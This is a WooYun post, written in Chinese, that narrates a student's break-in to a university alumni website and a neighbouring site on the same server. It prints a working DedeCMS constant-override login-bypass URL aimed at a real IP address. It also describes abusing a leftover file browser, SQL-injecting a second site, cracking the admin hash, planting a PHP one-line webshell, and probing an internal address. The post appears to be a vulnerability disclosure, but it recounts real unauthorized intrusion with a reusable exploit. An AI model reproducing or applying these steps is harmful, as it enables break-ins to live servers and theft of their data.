WooYun.org

恩，要放假了，学校还是没有给出在外网查成绩的可行方案，老师们公开的VPN用的人太多实在是太不稳定了，怎么办呢。。。我们自己搞一台挂个代理什么的试试吧~
首先去浙海大主页看看，恩？今天改程序了？页面完全是全新的，找找看吧= =在左下角找到了一个 校友网，网址相当不专业啊 http://61.153.216.101/xiao-you/ ，没看出来是什么程序，试下robots.txt吧，诶，果然有，这下有经验的一下就看出是织梦了~

看下后台在哪里~（被以前一个织梦坑惨了，完全找不到后台啊你妹= =）试下dede，果然没有，试下cwebs，也没有，试下dedecms，yooooo~，出来了~（后来证明去翻数据库错误消息文件里也是可以找到的）

看了下版本，v53.1 。找下有没有什么公开的漏洞，果然有一个常量覆盖的，直接架一个本地数据库进后台~
http://61.153.216.101/xiao-you/dedecms/login.php?dopost=login&validate=dcug&userid=admin&pwd=admin&_POST[GLOBALS][cfg_dbhost]=255.255.255.255&_POST[GLOBALS][cfg_dbuser]=dbusername&_POST[GLOBALS][cfg_dbpwd]=dbpassword&_POST[GLOBALS][cfg_dbname]=dbname
看下最简单的文件管理器删了没，呵呵= =果然删了，但是。。。管理员只删了file_manage_main.php，文件管理器不只这一个文件呦~试下file_pic_view.php，恩，果然能看见一些信息，把目录改到/呢？诶！这服务器上还挂了好多网站啊~

既然这站拿不下来索性去别的站看看~来到DKKT，进了下后台登录，v5.6，试下已知的SQL注入

成功拿到~上cmd5，恩？要钱，淘宝之~成功进入后台。这个站的文件管理器还在，新建一个php，插入一句话，成功。
菜刀之~

最后别忘了我们最初的想法，我们是为了在家里能顺利突破内网查成绩呦~试下file_get_conent('http://172.16.25.30/')。。。擦，为什么不行= =那搞这服务器就没多大意义了╮(╯_╰)╭，把玩了一会，没什么意思就删了~